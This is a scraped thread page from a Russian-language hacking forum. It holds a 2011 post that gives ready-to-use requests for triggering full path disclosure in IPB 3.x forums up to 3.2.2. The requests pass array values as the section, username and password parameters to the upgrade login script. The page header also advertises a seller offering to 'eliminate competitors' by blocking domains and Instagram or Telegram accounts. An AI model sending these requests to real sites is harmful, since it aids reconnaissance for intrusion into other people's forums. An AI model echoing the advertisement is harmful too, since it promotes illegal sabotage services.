[Обзор уязвимостей IPB]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
[Обзор уязвимостей IPB]

Опции темы

Поиск в этой теме

Опции просмотра

#10

16.09.2011, 19:21

Export

Новичок

Регистрация: 13.02.2010

Сообщений: 0

С нами: 8547867

Репутация: 0

Нашёл уязвимость на форумах IPB 3.x.x (Работает вплоть до 3.2.2.)

Код:

Раскрытие путей. (должен быть доступен upgrade)
http://форум/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
Также раскрытие доступно через. HTTP Live Header. Смотрим заголовки,меняем в 
http://форум/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login запрос
do=login&username=asd&password=asd(пример запроса)
на do=login&username[]=asd&password[]=asd

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей vBulletin]	bandera	Уязвимости CMS / форумов	167	17.10.2019 18:14
[Обзор уязвимостей в форумных движках]	Grey	Уязвимости CMS / форумов	49	02.04.2015 17:48
[Обзор уязвимостей XMBForum]	[x26]VOLAND	Уязвимости CMS / форумов	0	19.05.2008 13:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules